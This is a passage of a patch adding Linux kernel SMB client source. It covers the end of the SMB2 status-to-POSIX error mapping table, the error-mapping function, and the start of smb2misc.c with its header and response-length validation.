++	{STATUS_FVE_LOCKED_VOLUME, -EIO, "STATUS_FVE_LOCKED_VOLUME"},
++	{STATUS_FVE_NOT_ENCRYPTED, -EIO, "STATUS_FVE_NOT_ENCRYPTED"},
++	{STATUS_FVE_BAD_INFORMATION, -EIO, "STATUS_FVE_BAD_INFORMATION"},
++	{STATUS_FVE_TOO_SMALL, -EIO, "STATUS_FVE_TOO_SMALL"},
++	{STATUS_FVE_FAILED_WRONG_FS, -EIO, "STATUS_FVE_FAILED_WRONG_FS"},
++	{STATUS_FVE_FAILED_BAD_FS, -EIO, "STATUS_FVE_FAILED_BAD_FS"},
++	{STATUS_FVE_FS_NOT_EXTENDED, -EIO, "STATUS_FVE_FS_NOT_EXTENDED"},
++	{STATUS_FVE_FS_MOUNTED, -EIO, "STATUS_FVE_FS_MOUNTED"},
++	{STATUS_FVE_NO_LICENSE, -EIO, "STATUS_FVE_NO_LICENSE"},
++	{STATUS_FVE_ACTION_NOT_ALLOWED, -EIO, "STATUS_FVE_ACTION_NOT_ALLOWED"},
++	{STATUS_FVE_BAD_DATA, -EIO, "STATUS_FVE_BAD_DATA"},
++	{STATUS_FVE_VOLUME_NOT_BOUND, -EIO, "STATUS_FVE_VOLUME_NOT_BOUND"},
++	{STATUS_FVE_NOT_DATA_VOLUME, -EIO, "STATUS_FVE_NOT_DATA_VOLUME"},
++	{STATUS_FVE_CONV_READ_ERROR, -EIO, "STATUS_FVE_CONV_READ_ERROR"},
++	{STATUS_FVE_CONV_WRITE_ERROR, -EIO, "STATUS_FVE_CONV_WRITE_ERROR"},
++	{STATUS_FVE_OVERLAPPED_UPDATE, -EIO, "STATUS_FVE_OVERLAPPED_UPDATE"},
++	{STATUS_FVE_FAILED_SECTOR_SIZE, -EIO, "STATUS_FVE_FAILED_SECTOR_SIZE"},
++	{STATUS_FVE_FAILED_AUTHENTICATION, -EIO,
++	"STATUS_FVE_FAILED_AUTHENTICATION"},
++	{STATUS_FVE_NOT_OS_VOLUME, -EIO, "STATUS_FVE_NOT_OS_VOLUME"},
++	{STATUS_FVE_KEYFILE_NOT_FOUND, -EIO, "STATUS_FVE_KEYFILE_NOT_FOUND"},
++	{STATUS_FVE_KEYFILE_INVALID, -EIO, "STATUS_FVE_KEYFILE_INVALID"},
++	{STATUS_FVE_KEYFILE_NO_VMK, -EIO, "STATUS_FVE_KEYFILE_NO_VMK"},
++	{STATUS_FVE_TPM_DISABLED, -EIO, "STATUS_FVE_TPM_DISABLED"},
++	{STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO, -EIO,
++	"STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO"},
++	{STATUS_FVE_TPM_INVALID_PCR, -EIO, "STATUS_FVE_TPM_INVALID_PCR"},
++	{STATUS_FVE_TPM_NO_VMK, -EIO, "STATUS_FVE_TPM_NO_VMK"},
++	{STATUS_FVE_PIN_INVALID, -EIO, "STATUS_FVE_PIN_INVALID"},
++	{STATUS_FVE_AUTH_INVALID_APPLICATION, -EIO,
++	"STATUS_FVE_AUTH_INVALID_APPLICATION"},
++	{STATUS_FVE_AUTH_INVALID_CONFIG, -EIO,
++	"STATUS_FVE_AUTH_INVALID_CONFIG"},
++	{STATUS_FVE_DEBUGGER_ENABLED, -EIO, "STATUS_FVE_DEBUGGER_ENABLED"},
++	{STATUS_FVE_DRY_RUN_FAILED, -EIO, "STATUS_FVE_DRY_RUN_FAILED"},
++	{STATUS_FVE_BAD_METADATA_POINTER, -EIO,
++	"STATUS_FVE_BAD_METADATA_POINTER"},
++	{STATUS_FVE_OLD_METADATA_COPY, -EIO, "STATUS_FVE_OLD_METADATA_COPY"},
++	{STATUS_FVE_REBOOT_REQUIRED, -EIO, "STATUS_FVE_REBOOT_REQUIRED"},
++	{STATUS_FVE_RAW_ACCESS, -EIO, "STATUS_FVE_RAW_ACCESS"},
++	{STATUS_FVE_RAW_BLOCKED, -EIO, "STATUS_FVE_RAW_BLOCKED"},
++	{STATUS_FWP_CALLOUT_NOT_FOUND, -EIO, "STATUS_FWP_CALLOUT_NOT_FOUND"},
++	{STATUS_FWP_CONDITION_NOT_FOUND, -EIO,
++	"STATUS_FWP_CONDITION_NOT_FOUND"},
++	{STATUS_FWP_FILTER_NOT_FOUND, -EIO, "STATUS_FWP_FILTER_NOT_FOUND"},
++	{STATUS_FWP_LAYER_NOT_FOUND, -EIO, "STATUS_FWP_LAYER_NOT_FOUND"},
++	{STATUS_FWP_PROVIDER_NOT_FOUND, -EIO, "STATUS_FWP_PROVIDER_NOT_FOUND"},
++	{STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND, -EIO,
++	"STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND"},
++	{STATUS_FWP_SUBLAYER_NOT_FOUND, -EIO, "STATUS_FWP_SUBLAYER_NOT_FOUND"},
++	{STATUS_FWP_NOT_FOUND, -EIO, "STATUS_FWP_NOT_FOUND"},
++	{STATUS_FWP_ALREADY_EXISTS, -EIO, "STATUS_FWP_ALREADY_EXISTS"},
++	{STATUS_FWP_IN_USE, -EIO, "STATUS_FWP_IN_USE"},
++	{STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS, -EIO,
++	"STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS"},
++	{STATUS_FWP_WRONG_SESSION, -EIO, "STATUS_FWP_WRONG_SESSION"},
++	{STATUS_FWP_NO_TXN_IN_PROGRESS, -EIO, "STATUS_FWP_NO_TXN_IN_PROGRESS"},
++	{STATUS_FWP_TXN_IN_PROGRESS, -EIO, "STATUS_FWP_TXN_IN_PROGRESS"},
++	{STATUS_FWP_TXN_ABORTED, -EIO, "STATUS_FWP_TXN_ABORTED"},
++	{STATUS_FWP_SESSION_ABORTED, -EIO, "STATUS_FWP_SESSION_ABORTED"},
++	{STATUS_FWP_INCOMPATIBLE_TXN, -EIO, "STATUS_FWP_INCOMPATIBLE_TXN"},
++	{STATUS_FWP_TIMEOUT, -ETIMEDOUT, "STATUS_FWP_TIMEOUT"},
++	{STATUS_FWP_NET_EVENTS_DISABLED, -EIO,
++	"STATUS_FWP_NET_EVENTS_DISABLED"},
++	{STATUS_FWP_INCOMPATIBLE_LAYER, -EIO, "STATUS_FWP_INCOMPATIBLE_LAYER"},
++	{STATUS_FWP_KM_CLIENTS_ONLY, -EIO, "STATUS_FWP_KM_CLIENTS_ONLY"},
++	{STATUS_FWP_LIFETIME_MISMATCH, -EIO, "STATUS_FWP_LIFETIME_MISMATCH"},
++	{STATUS_FWP_BUILTIN_OBJECT, -EIO, "STATUS_FWP_BUILTIN_OBJECT"},
++	{STATUS_FWP_TOO_MANY_BOOTTIME_FILTERS, -EIO,
++	"STATUS_FWP_TOO_MANY_BOOTTIME_FILTERS"},
++	{STATUS_FWP_TOO_MANY_CALLOUTS, -EIO, "STATUS_FWP_TOO_MANY_CALLOUTS"},
++	{STATUS_FWP_NOTIFICATION_DROPPED, -EIO,
++	"STATUS_FWP_NOTIFICATION_DROPPED"},
++	{STATUS_FWP_TRAFFIC_MISMATCH, -EIO, "STATUS_FWP_TRAFFIC_MISMATCH"},
++	{STATUS_FWP_INCOMPATIBLE_SA_STATE, -EIO,
++	"STATUS_FWP_INCOMPATIBLE_SA_STATE"},
++	{STATUS_FWP_NULL_POINTER, -EIO, "STATUS_FWP_NULL_POINTER"},
++	{STATUS_FWP_INVALID_ENUMERATOR, -EIO, "STATUS_FWP_INVALID_ENUMERATOR"},
++	{STATUS_FWP_INVALID_FLAGS, -EIO, "STATUS_FWP_INVALID_FLAGS"},
++	{STATUS_FWP_INVALID_NET_MASK, -EIO, "STATUS_FWP_INVALID_NET_MASK"},
++	{STATUS_FWP_INVALID_RANGE, -EIO, "STATUS_FWP_INVALID_RANGE"},
++	{STATUS_FWP_INVALID_INTERVAL, -EIO, "STATUS_FWP_INVALID_INTERVAL"},
++	{STATUS_FWP_ZERO_LENGTH_ARRAY, -EIO, "STATUS_FWP_ZERO_LENGTH_ARRAY"},
++	{STATUS_FWP_NULL_DISPLAY_NAME, -EIO, "STATUS_FWP_NULL_DISPLAY_NAME"},
++	{STATUS_FWP_INVALID_ACTION_TYPE, -EIO,
++	"STATUS_FWP_INVALID_ACTION_TYPE"},
++	{STATUS_FWP_INVALID_WEIGHT, -EIO, "STATUS_FWP_INVALID_WEIGHT"},
++	{STATUS_FWP_MATCH_TYPE_MISMATCH, -EIO,
++	"STATUS_FWP_MATCH_TYPE_MISMATCH"},
++	{STATUS_FWP_TYPE_MISMATCH, -EIO, "STATUS_FWP_TYPE_MISMATCH"},
++	{STATUS_FWP_OUT_OF_BOUNDS, -EIO, "STATUS_FWP_OUT_OF_BOUNDS"},
++	{STATUS_FWP_RESERVED, -EIO, "STATUS_FWP_RESERVED"},
++	{STATUS_FWP_DUPLICATE_CONDITION, -EIO,
++	"STATUS_FWP_DUPLICATE_CONDITION"},
++	{STATUS_FWP_DUPLICATE_KEYMOD, -EIO, "STATUS_FWP_DUPLICATE_KEYMOD"},
++	{STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER, -EIO,
++	"STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER"},
++	{STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER, -EIO,
++	"STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER"},
++	{STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER, -EIO,
++	"STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER"},
++	{STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT, -EIO,
++	"STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT"},
++	{STATUS_FWP_INCOMPATIBLE_AUTH_METHOD, -EIO,
++	"STATUS_FWP_INCOMPATIBLE_AUTH_METHOD"},
++	{STATUS_FWP_INCOMPATIBLE_DH_GROUP, -EIO,
++	"STATUS_FWP_INCOMPATIBLE_DH_GROUP"},
++	{STATUS_FWP_EM_NOT_SUPPORTED, -EOPNOTSUPP,
++	"STATUS_FWP_EM_NOT_SUPPORTED"},
++	{STATUS_FWP_NEVER_MATCH, -EIO, "STATUS_FWP_NEVER_MATCH"},
++	{STATUS_FWP_PROVIDER_CONTEXT_MISMATCH, -EIO,
++	"STATUS_FWP_PROVIDER_CONTEXT_MISMATCH"},
++	{STATUS_FWP_INVALID_PARAMETER, -EIO, "STATUS_FWP_INVALID_PARAMETER"},
++	{STATUS_FWP_TOO_MANY_SUBLAYERS, -EIO, "STATUS_FWP_TOO_MANY_SUBLAYERS"},
++	{STATUS_FWP_CALLOUT_NOTIFICATION_FAILED, -EIO,
++	"STATUS_FWP_CALLOUT_NOTIFICATION_FAILED"},
++	{STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG, -EIO,
++	"STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG"},
++	{STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG, -EIO,
++	"STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG"},
++	{STATUS_FWP_TCPIP_NOT_READY, -EIO, "STATUS_FWP_TCPIP_NOT_READY"},
++	{STATUS_FWP_INJECT_HANDLE_CLOSING, -EIO,
++	"STATUS_FWP_INJECT_HANDLE_CLOSING"},
++	{STATUS_FWP_INJECT_HANDLE_STALE, -EIO,
++	"STATUS_FWP_INJECT_HANDLE_STALE"},
++	{STATUS_FWP_CANNOT_PEND, -EIO, "STATUS_FWP_CANNOT_PEND"},
++	{STATUS_NDIS_CLOSING, -EIO, "STATUS_NDIS_CLOSING"},
++	{STATUS_NDIS_BAD_VERSION, -EIO, "STATUS_NDIS_BAD_VERSION"},
++	{STATUS_NDIS_BAD_CHARACTERISTICS, -EIO,
++	"STATUS_NDIS_BAD_CHARACTERISTICS"},
++	{STATUS_NDIS_ADAPTER_NOT_FOUND, -EIO, "STATUS_NDIS_ADAPTER_NOT_FOUND"},
++	{STATUS_NDIS_OPEN_FAILED, -EIO, "STATUS_NDIS_OPEN_FAILED"},
++	{STATUS_NDIS_DEVICE_FAILED, -EIO, "STATUS_NDIS_DEVICE_FAILED"},
++	{STATUS_NDIS_MULTICAST_FULL, -EIO, "STATUS_NDIS_MULTICAST_FULL"},
++	{STATUS_NDIS_MULTICAST_EXISTS, -EIO, "STATUS_NDIS_MULTICAST_EXISTS"},
++	{STATUS_NDIS_MULTICAST_NOT_FOUND, -EIO,
++	"STATUS_NDIS_MULTICAST_NOT_FOUND"},
++	{STATUS_NDIS_REQUEST_ABORTED, -EIO, "STATUS_NDIS_REQUEST_ABORTED"},
++	{STATUS_NDIS_RESET_IN_PROGRESS, -EIO, "STATUS_NDIS_RESET_IN_PROGRESS"},
++	{STATUS_NDIS_INVALID_PACKET, -EIO, "STATUS_NDIS_INVALID_PACKET"},
++	{STATUS_NDIS_INVALID_DEVICE_REQUEST, -EIO,
++	"STATUS_NDIS_INVALID_DEVICE_REQUEST"},
++	{STATUS_NDIS_ADAPTER_NOT_READY, -EIO, "STATUS_NDIS_ADAPTER_NOT_READY"},
++	{STATUS_NDIS_INVALID_LENGTH, -EIO, "STATUS_NDIS_INVALID_LENGTH"},
++	{STATUS_NDIS_INVALID_DATA, -EIO, "STATUS_NDIS_INVALID_DATA"},
++	{STATUS_NDIS_BUFFER_TOO_SHORT, -ENOBUFS,
++	"STATUS_NDIS_BUFFER_TOO_SHORT"},
++	{STATUS_NDIS_INVALID_OID, -EIO, "STATUS_NDIS_INVALID_OID"},
++	{STATUS_NDIS_ADAPTER_REMOVED, -EIO, "STATUS_NDIS_ADAPTER_REMOVED"},
++	{STATUS_NDIS_UNSUPPORTED_MEDIA, -EIO, "STATUS_NDIS_UNSUPPORTED_MEDIA"},
++	{STATUS_NDIS_GROUP_ADDRESS_IN_USE, -EIO,
++	"STATUS_NDIS_GROUP_ADDRESS_IN_USE"},
++	{STATUS_NDIS_FILE_NOT_FOUND, -EIO, "STATUS_NDIS_FILE_NOT_FOUND"},
++	{STATUS_NDIS_ERROR_READING_FILE, -EIO,
++	"STATUS_NDIS_ERROR_READING_FILE"},
++	{STATUS_NDIS_ALREADY_MAPPED, -EIO, "STATUS_NDIS_ALREADY_MAPPED"},
++	{STATUS_NDIS_RESOURCE_CONFLICT, -EIO, "STATUS_NDIS_RESOURCE_CONFLICT"},
++	{STATUS_NDIS_MEDIA_DISCONNECTED, -EIO,
++	"STATUS_NDIS_MEDIA_DISCONNECTED"},
++	{STATUS_NDIS_INVALID_ADDRESS, -EIO, "STATUS_NDIS_INVALID_ADDRESS"},
++	{STATUS_NDIS_PAUSED, -EIO, "STATUS_NDIS_PAUSED"},
++	{STATUS_NDIS_INTERFACE_NOT_FOUND, -EIO,
++	"STATUS_NDIS_INTERFACE_NOT_FOUND"},
++	{STATUS_NDIS_UNSUPPORTED_REVISION, -EIO,
++	"STATUS_NDIS_UNSUPPORTED_REVISION"},
++	{STATUS_NDIS_INVALID_PORT, -EIO, "STATUS_NDIS_INVALID_PORT"},
++	{STATUS_NDIS_INVALID_PORT_STATE, -EIO,
++	"STATUS_NDIS_INVALID_PORT_STATE"},
++	{STATUS_NDIS_LOW_POWER_STATE, -EIO, "STATUS_NDIS_LOW_POWER_STATE"},
++	{STATUS_NDIS_NOT_SUPPORTED, -ENOSYS, "STATUS_NDIS_NOT_SUPPORTED"},
++	{STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED, -EIO,
++	"STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED"},
++	{STATUS_NDIS_DOT11_MEDIA_IN_USE, -EIO,
++	"STATUS_NDIS_DOT11_MEDIA_IN_USE"},
++	{STATUS_NDIS_DOT11_POWER_STATE_INVALID, -EIO,
++	"STATUS_NDIS_DOT11_POWER_STATE_INVALID"},
++	{STATUS_IPSEC_BAD_SPI, -EIO, "STATUS_IPSEC_BAD_SPI"},
++	{STATUS_IPSEC_SA_LIFETIME_EXPIRED, -EIO,
++	"STATUS_IPSEC_SA_LIFETIME_EXPIRED"},
++	{STATUS_IPSEC_WRONG_SA, -EIO, "STATUS_IPSEC_WRONG_SA"},
++	{STATUS_IPSEC_REPLAY_CHECK_FAILED, -EIO,
++	"STATUS_IPSEC_REPLAY_CHECK_FAILED"},
++	{STATUS_IPSEC_INVALID_PACKET, -EIO, "STATUS_IPSEC_INVALID_PACKET"},
++	{STATUS_IPSEC_INTEGRITY_CHECK_FAILED, -EIO,
++	"STATUS_IPSEC_INTEGRITY_CHECK_FAILED"},
++	{STATUS_IPSEC_CLEAR_TEXT_DROP, -EIO, "STATUS_IPSEC_CLEAR_TEXT_DROP"},
++	{0, 0, NULL}
++};
++
++/*****************************************************************************
++ Print an error message from the status code
++ *****************************************************************************/
++static void
++smb2_print_status(__le32 status)
++{
++	int idx = 0;
++
++	while (smb2_error_map_table[idx].status_string != NULL) {
++		if ((smb2_error_map_table[idx].smb2_status) == status) {
++			pr_notice("Status code returned 0x%08x %s\n", status,
++				  smb2_error_map_table[idx].status_string);
++		}
++		idx++;
++	}
++	return;
++}
++
++int
++map_smb2_to_linux_error(char *buf, bool log_err)
++{
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
++	unsigned int i;
++	int rc = -EIO;
++	__le32 smb2err = shdr->Status;
++
++	if (smb2err == 0) {
++		trace_smb3_cmd_done(le32_to_cpu(shdr->Id.SyncId.TreeId),
++			      le64_to_cpu(shdr->SessionId),
++			      le16_to_cpu(shdr->Command),
++			      le64_to_cpu(shdr->MessageId));
++		return 0;
++	}
++
++	/* mask facility */
++	if (log_err && (smb2err != STATUS_MORE_PROCESSING_REQUIRED) &&
++	    (smb2err != STATUS_END_OF_FILE))
++		smb2_print_status(smb2err);
++	else if (cifsFYI & CIFS_RC)
++		smb2_print_status(smb2err);
++
++	for (i = 0; i < sizeof(smb2_error_map_table) /
++			sizeof(struct status_to_posix_error); i++) {
++		if (smb2_error_map_table[i].smb2_status == smb2err) {
++			rc = smb2_error_map_table[i].posix_error;
++			break;
++		}
++	}
++
++	/* on error mapping not found  - return EIO */
++
++	cifs_dbg(FYI, "Mapping SMB2 status code 0x%08x to POSIX err %d\n",
++		 __le32_to_cpu(smb2err), rc);
++
++	trace_smb3_cmd_err(le32_to_cpu(shdr->Id.SyncId.TreeId),
++			   le64_to_cpu(shdr->SessionId),
++			   le16_to_cpu(shdr->Command),
++			   le64_to_cpu(shdr->MessageId),
++			   le32_to_cpu(smb2err), rc);
++	return rc;
++}
+diff --git a/fs/smb/client/smb2misc.c b/fs/smb/client/smb2misc.c
+new file mode 100644
+index 0000000000000..572293c18e16f
+--- /dev/null
++++ b/fs/smb/client/smb2misc.c
+@@ -0,0 +1,944 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2011
++ *                 Etersoft, 2012
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *              Pavel Shilovsky (pshilovsky@samba.org) 2012
++ *
++ */
++#include <linux/ctype.h>
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "smb2proto.h"
++#include "cifs_debug.h"
++#include "cifs_unicode.h"
++#include "smb2status.h"
++#include "smb2glob.h"
++#include "nterr.h"
++#include "cached_dir.h"
++
++static int
++check_smb2_hdr(struct smb2_hdr *shdr, __u64 mid)
++{
++	__u64 wire_mid = le64_to_cpu(shdr->MessageId);
++
++	/*
++	 * Make sure that this really is an SMB, that it is a response,
++	 * and that the message ids match.
++	 */
++	if ((shdr->ProtocolId == SMB2_PROTO_NUMBER) &&
++	    (mid == wire_mid)) {
++		if (shdr->Flags & SMB2_FLAGS_SERVER_TO_REDIR)
++			return 0;
++		else {
++			/* only one valid case where server sends us request */
++			if (shdr->Command == SMB2_OPLOCK_BREAK)
++				return 0;
++			else
++				cifs_dbg(VFS, "Received Request not response\n");
++		}
++	} else { /* bad signature or mid */
++		if (shdr->ProtocolId != SMB2_PROTO_NUMBER)
++			cifs_dbg(VFS, "Bad protocol string signature header %x\n",
++				 le32_to_cpu(shdr->ProtocolId));
++		if (mid != wire_mid)
++			cifs_dbg(VFS, "Mids do not match: %llu and %llu\n",
++				 mid, wire_mid);
++	}
++	cifs_dbg(VFS, "Bad SMB detected. The Mid=%llu\n", wire_mid);
++	return 1;
++}
++
++/*
++ *  The following table defines the expected "StructureSize" of SMB2 responses
++ *  in order by SMB2 command.  This is similar to "wct" in SMB/CIFS responses.
++ *
++ *  Note that commands are defined in smb2pdu.h in le16 but the array below is
++ *  indexed by command in host byte order
++ */
++static const __le16 smb2_rsp_struct_sizes[NUMBER_OF_SMB2_COMMANDS] = {
++	/* SMB2_NEGOTIATE */ cpu_to_le16(65),
++	/* SMB2_SESSION_SETUP */ cpu_to_le16(9),
++	/* SMB2_LOGOFF */ cpu_to_le16(4),
++	/* SMB2_TREE_CONNECT */ cpu_to_le16(16),
++	/* SMB2_TREE_DISCONNECT */ cpu_to_le16(4),
++	/* SMB2_CREATE */ cpu_to_le16(89),
++	/* SMB2_CLOSE */ cpu_to_le16(60),
++	/* SMB2_FLUSH */ cpu_to_le16(4),
++	/* SMB2_READ */ cpu_to_le16(17),
++	/* SMB2_WRITE */ cpu_to_le16(17),
++	/* SMB2_LOCK */ cpu_to_le16(4),
++	/* SMB2_IOCTL */ cpu_to_le16(49),
++	/* BB CHECK this ... not listed in documentation */
++	/* SMB2_CANCEL */ cpu_to_le16(0),
++	/* SMB2_ECHO */ cpu_to_le16(4),
++	/* SMB2_QUERY_DIRECTORY */ cpu_to_le16(9),
++	/* SMB2_CHANGE_NOTIFY */ cpu_to_le16(9),
++	/* SMB2_QUERY_INFO */ cpu_to_le16(9),
++	/* SMB2_SET_INFO */ cpu_to_le16(2),
++	/* BB FIXME can also be 44 for lease break */
++	/* SMB2_OPLOCK_BREAK */ cpu_to_le16(24)
++};
++
++#define SMB311_NEGPROT_BASE_SIZE (sizeof(struct smb2_hdr) + sizeof(struct smb2_negotiate_rsp))
++
++static __u32 get_neg_ctxt_len(struct smb2_hdr *hdr, __u32 len,
++			      __u32 non_ctxlen)
++{
++	__u16 neg_count;
++	__u32 nc_offset, size_of_pad_before_neg_ctxts;
++	struct smb2_negotiate_rsp *pneg_rsp = (struct smb2_negotiate_rsp *)hdr;
++
++	/* Negotiate contexts are only valid for latest dialect SMB3.11 */
++	neg_count = le16_to_cpu(pneg_rsp->NegotiateContextCount);
++	if ((neg_count == 0) ||
++	   (pneg_rsp->DialectRevision != cpu_to_le16(SMB311_PROT_ID)))
++		return 0;
++
++	/*
++	 * if SPNEGO blob present (ie the RFC2478 GSS info which indicates
++	 * which security mechanisms the server supports) make sure that
++	 * the negotiate contexts start after it
++	 */
++	nc_offset = le32_to_cpu(pneg_rsp->NegotiateContextOffset);
++	/*
++	 * non_ctxlen is at least shdr->StructureSize + pdu->StructureSize2
++	 * and the latter is 1 byte bigger than the fix-sized area of the
++	 * NEGOTIATE response
++	 */
++	if (nc_offset + 1 < non_ctxlen) {
++		pr_warn_once("Invalid negotiate context offset %d\n", nc_offset);
++		return 0;
++	} else if (nc_offset + 1 == non_ctxlen) {
++		cifs_dbg(FYI, "no SPNEGO security blob in negprot rsp\n");
++		size_of_pad_before_neg_ctxts = 0;
++	} else if (non_ctxlen == SMB311_NEGPROT_BASE_SIZE)
++		/* has padding, but no SPNEGO blob */
++		size_of_pad_before_neg_ctxts = nc_offset - non_ctxlen + 1;
++	else
++		size_of_pad_before_neg_ctxts = nc_offset - non_ctxlen;
++
++	/* Verify that at least minimal negotiate contexts fit within frame */
++	if (len < nc_offset + (neg_count * sizeof(struct smb2_neg_context))) {
++		pr_warn_once("negotiate context goes beyond end\n");
++		return 0;
++	}
++
++	cifs_dbg(FYI, "length of negcontexts %d pad %d\n",
++		len - nc_offset, size_of_pad_before_neg_ctxts);
++
++	/* length of negcontexts including pad from end of sec blob to them */
++	return (len - nc_offset) + size_of_pad_before_neg_ctxts;
++}
++
++int
++smb2_check_message(char *buf, unsigned int len, struct TCP_Server_Info *server)
++{
++	struct TCP_Server_Info *pserver;
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
++	struct smb2_pdu *pdu = (struct smb2_pdu *)shdr;
++	int hdr_size = sizeof(struct smb2_hdr);
++	int pdu_size = sizeof(struct smb2_pdu);
++	int command;
++	__u32 calc_len; /* calculated length */
++	__u64 mid;
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++
++	/*
++	 * Add function to do table lookup of StructureSize by command
++	 * ie Validate the wct via smb2_struct_sizes table above
++	 */
++	if (shdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM) {
++		struct smb2_transform_hdr *thdr =
++			(struct smb2_transform_hdr *)buf;
++		struct cifs_ses *ses = NULL;
++		struct cifs_ses *iter;
++
++		/* decrypt frame now that it is completely read in */
++		spin_lock(&cifs_tcp_ses_lock);
++		list_for_each_entry(iter, &pserver->smb_ses_list, smb_ses_list) {
++			if (iter->Suid == le64_to_cpu(thdr->SessionId)) {
++				ses = iter;
++				break;
++			}
++		}
++		spin_unlock(&cifs_tcp_ses_lock);
++		if (!ses) {
++			cifs_dbg(VFS, "no decryption - session id not found\n");
++			return 1;
++		}
++	}
++
++	mid = le64_to_cpu(shdr->MessageId);
++	if (len < pdu_size) {
++		if ((len >= hdr_size)
++		    && (shdr->Status != 0)) {
++			pdu->StructureSize2 = 0;
++			/*
++			 * As with SMB/CIFS, on some error cases servers may
++			 * not return wct properly
++			 */
++			return 0;
++		} else {
++			cifs_dbg(VFS, "Length less than SMB header size\n");
++		}
++		return 1;
++	}
++	if (len > CIFSMaxBufSize + MAX_SMB2_HDR_SIZE) {
++		cifs_dbg(VFS, "SMB length greater than maximum, mid=%llu\n",
++			 mid);
++		return 1;
++	}
++
++	if (check_smb2_hdr(shdr, mid))
++		return 1;
++
++	if (shdr->StructureSize != SMB2_HEADER_STRUCTURE_SIZE) {
++		cifs_dbg(VFS, "Invalid structure size %u\n",
++			 le16_to_cpu(shdr->StructureSize));
++		return 1;
++	}
++
++	command = le16_to_cpu(shdr->Command);
++	if (command >= NUMBER_OF_SMB2_COMMANDS) {
++		cifs_dbg(VFS, "Invalid SMB2 command %d\n", command);
++		return 1;
++	}
++
++	if (smb2_rsp_struct_sizes[command] != pdu->StructureSize2) {
++		if (command != SMB2_OPLOCK_BREAK_HE && (shdr->Status == 0 ||
++		    pdu->StructureSize2 != SMB2_ERROR_STRUCTURE_SIZE2_LE)) {
++			/* error packets have 9 byte structure size */
++			cifs_dbg(VFS, "Invalid response size %u for command %d\n",
++				 le16_to_cpu(pdu->StructureSize2), command);
++			return 1;
++		} else if (command == SMB2_OPLOCK_BREAK_HE
++			   && (shdr->Status == 0)
++			   && (le16_to_cpu(pdu->StructureSize2) != 44)
++			   && (le16_to_cpu(pdu->StructureSize2) != 36)) {
++			/* special case for SMB2.1 lease break message */
++			cifs_dbg(VFS, "Invalid response size %d for oplock break\n",
++				 le16_to_cpu(pdu->StructureSize2));
++			return 1;
++		}
++	}
++
++	calc_len = smb2_calc_size(buf);
++
++	/* For SMB2_IOCTL, OutputOffset and OutputLength are optional, so might
++	 * be 0, and not a real miscalculation */
++	if (command == SMB2_IOCTL_HE && calc_len == 0)
++		return 0;
++
++	if (command == SMB2_NEGOTIATE_HE)
++		calc_len += get_neg_ctxt_len(shdr, len, calc_len);
++
++	if (len != calc_len) {
++		/* create failed on symlink */
++		if (command == SMB2_CREATE_HE &&
++		    shdr->Status == STATUS_STOPPED_ON_SYMLINK)
++			return 0;
++		/* Windows 7 server returns 24 bytes more */
++		if (calc_len + 24 == len && command == SMB2_OPLOCK_BREAK_HE)
++			return 0;
++		/* server can return one byte more due to implied bcc[0] */
++		if (calc_len == len + 1)
++			return 0;
++
++		/*
++		 * Some windows servers (win2016) will pad also the final
++		 * PDU in a compound to 8 bytes.
++		 */
++		if (ALIGN(calc_len, 8) == len)
++			return 0;
++
++		/*
++		 * MacOS server pads after SMB2.1 write response with 3 bytes
++		 * of junk. Other servers match RFC1001 len to actual
++		 * SMB2/SMB3 frame length (header + smb2 response specific data)
++		 * Some windows servers also pad up to 8 bytes when compounding.
++		 */
++		if (calc_len < len)
++			return 0;
++
++		/* Only log a message if len was really miscalculated */
++		if (unlikely(cifsFYI))
++			cifs_dbg(FYI, "Server response too short: calculated "
++				 "length %u doesn't match read length %u (cmd=%d, mid=%llu)\n",
++				 calc_len, len, command, mid);
++		else
++			pr_warn("Server response too short: calculated length "
++				"%u doesn't match read length %u (cmd=%d, mid=%llu)\n",
++				calc_len, len, command, mid);
++
++		return 1;
++	}
++	return 0;
++}
++
++/*
++ * The size of the variable area depends on the offset and length fields
++ * located in different fields for various SMB2 responses. SMB2 responses
++ * with no variable length info, show an offset of zero for the offset field.
++ */
++static const bool has_smb2_data_area[NUMBER_OF_SMB2_COMMANDS] = {
++	/* SMB2_NEGOTIATE */ true,
++	/* SMB2_SESSION_SETUP */ true,
++	/* SMB2_LOGOFF */ false,
++	/* SMB2_TREE_CONNECT */	false,
++	/* SMB2_TREE_DISCONNECT */ false,
++	/* SMB2_CREATE */ true,
++	/* SMB2_CLOSE */ false,
++	/* SMB2_FLUSH */ false,
++	/* SMB2_READ */	true,
++	/* SMB2_WRITE */ false,
++	/* SMB2_LOCK */	false,
++	/* SMB2_IOCTL */ true,
++	/* SMB2_CANCEL */ false, /* BB CHECK this not listed in documentation */
++	/* SMB2_ECHO */ false,
++	/* SMB2_QUERY_DIRECTORY */ true,
++	/* SMB2_CHANGE_NOTIFY */ true,
++	/* SMB2_QUERY_INFO */ true,
++	/* SMB2_SET_INFO */ false,
++	/* SMB2_OPLOCK_BREAK */ false
++};
++
++/*
